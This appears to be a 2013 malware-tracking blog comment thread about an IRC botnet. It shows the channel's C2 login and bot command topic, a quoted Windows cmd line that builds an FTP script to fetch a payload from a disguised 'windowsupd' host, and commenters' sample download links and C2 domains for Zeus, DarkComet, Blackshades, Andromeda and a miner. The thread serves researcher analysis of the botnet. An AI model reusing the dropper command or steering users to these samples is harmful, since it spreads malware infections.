Resolved : [rageevo.sytes.net] To [190.196.122.227]
PASS pass
NICK raGe|PkfUmcvBta
USER ofmfn “fo8.net” “rage” :ofmfn
JOIN #Ev0-h4cK# ev0h4ck
Now talking in #Ev0-h4cK#
Topic On: [ #Ev0-h4cK# ] [ !xpl 100 1 190 -b 2 0 ]
Topic By: [DJ-L0rD|Ev0| ]
Modes On: [#Ev0-h4cK# ] [ +smntrul 500 ]
samples here:cmd /c echo open windowsupd.serveftp.com 21 >> ik &echo user test test >> ik &echo binary >> ik $
hosting infos:
http://whois.domaintools.com/190.196.122.227
Anonymous - April 8, 2013 at 9:48 am
3 different bots
http://rghost.net/45134133
Zeus:
http://rghost.net/45134146
Zeus and other bot:
http://rghost.net/45134153
Pig - April 8, 2013 at 2:28 pm
than you for your submitions 🙂
have fun
I_Post_Ur_Info - April 8, 2013 at 9:07 pm
3_malware.rar
andromeda.exe a541351a.mine.nu (suspended)
darkomet 4.3.1.exe d541351d.mine.nu:1645
blakshades.exe b541351b.mine.nu
zeus.rar
zeus.exe (failed to execute)
infected.rar
infected.exe bitcoin miner (server to download miner from is down)